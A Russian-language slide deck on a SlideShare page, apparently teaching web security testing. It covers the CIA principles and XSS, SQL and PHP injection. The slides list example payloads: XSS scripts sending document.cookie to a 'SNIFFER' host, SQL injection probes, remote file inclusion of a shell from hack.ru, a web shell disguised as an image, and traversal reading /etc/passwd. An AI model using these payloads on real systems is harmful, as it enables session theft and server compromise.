Security testing

1,099 views
993 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,099
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
19
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Security testing

  1. 1. Тестирование безопасности или Security and Access Control Testing
  2. 2. Принципы безопасности ПО • Конфиденциальность • Целостность • Доступность
  3. 3. КонфиденциальностьКонфиденциальность - это сокрытие определенныхресурсов или информации. Под конфиденциальностьюможно понимать ограничение доступа к ресурсунекоторой категории пользователей, или другимисловами, при каких условиях пользовательавторизован получить доступ к данному ресурсу.
  4. 4. ЦелостностьЦелостность - ожидается, что ресурс будет изменентолько соответствующим способом определеннойгруппой пользователей. Является условием того, чтоданные не были несанкционированномодифицированы при выполнении любой операциинад ними, будь то передача, хранение илипредставление.
  5. 5. ДоступностьДоступность - состояние информации (ресурсовавтоматизированной информационной системы), прикотором субъекты, имеющие право доступа, могутреализовывать их беспрепятственно. Как правило, чемболее критичен ресурс тем выше уровень доступностидолжен быть.
  6. 6. Основные типы уязвимостей Web-приложений • XSS injection • SQL injection • PHP injection
  7. 7. XSS injection (Cross Site Scripting)XSS injection - тип уязвимости интерактивныхинформационных систем в вебе. XSS возникает, когда вгенерируемые сервером страницы по какой-топричине попадают пользовательские скрипты.Специфика подобных атак заключается в том, чтовместо непосредственной атаки сервера онииспользуют уязвимый сервер в качестве средства атакина клиента.
  8. 8. XSS injection (Cross Site Scripting) Примеры:• <script>alert(‘XSS’)</script>• <IMG SRC="javascript:alert(XSS);">• <script src="http://oursite/blabla.js"></script>• <script>document.location="SNIFFER"+document.cookie</script>• <script>img=new Image();img.src="SNIFFER"+document.cookie</script>
  9. 9. SQL injectionSQL–injection - один из распространённых способоввзлома сайтов и программ, работающих с базамиданных, основанный на внедрении в запроспроизвольного SQL-кода.Внедрение SQL, в зависимости от типа используемойСУБД и условий внедрения, может дать возможностьатакующему выполнить произвольный запрос к базеданных, получить возможность чтения и/или записилокальных файлов и т.д.
  10. 10. SQL injection Исходная страница: site.com/index.php?id=1 Примеры:• site.com/index.php?id=1 ‘ (Выводит ошибку)• site.com/index.php?id=1 blablabla (Выводит ошибку)• site.com/index.php?id=2-1(Выводит страницу 1)• site.com/index.php?id=1*1(Выводит страницу 1)• site.com/index.php?id=1*2(Выводит страницу 2)• site.com/index.php?id=1+and+1=1(Выводит страницу 1)• site.com/index.php?id=1+and+1=2(Выводит ошибку, или ничего не выводит)
  11. 11. PHP injectionPHP injection - один из способов взлома веб-сайтов,работающих на PHP, заключающийся в выполнениипостороннего кода на серверной стороне. Потенциальноопасными функциями являются:eval(),preg_replace() (с модификатором «e»),require_once(),include_once(),include(),require(),create_function().PHP-инъекция становится возможной, если входныепараметры принимаются и используются без проверки.
  12. 12. PHP injection Удалённый инклуд (Remote File Inclusion)<?php if($_GET[page]..php) { include($_GET[page]..php); } else { include($file..php); }?>• Нет проверки на существование значения $_GET[page] http://site.ru/index.php?page=http://hack.ru/shell• Переменная $file не была определена раннее http://site.ru/index.php?file=http://hack.ru/shell
  13. 13. PHP injection Локальный инклуд (Local File Inclusion)<?php … include("include/$file"); …?>• Под видом картинки заливаем веб-шелл:http://www.site.com/index.php?include=../forum/images/shell.jpg• Если знаем движок и структуру приложения, можем прочитать конфигурационные файлы:http://www.site.com/index.php?include=../forum/admin/config.php• Либо даже так:http://www.site.com/index.php?include=../../../../etc/passwd
  14. 14. Что почитать по теме?• XSS (Cross Site Scripting) Cheat Sheet http://ha.ckers.org/xss.html• Много статей по SQL/PHP/XSS-inj с примерами http://forum.antichat.ru/thread19610.html

×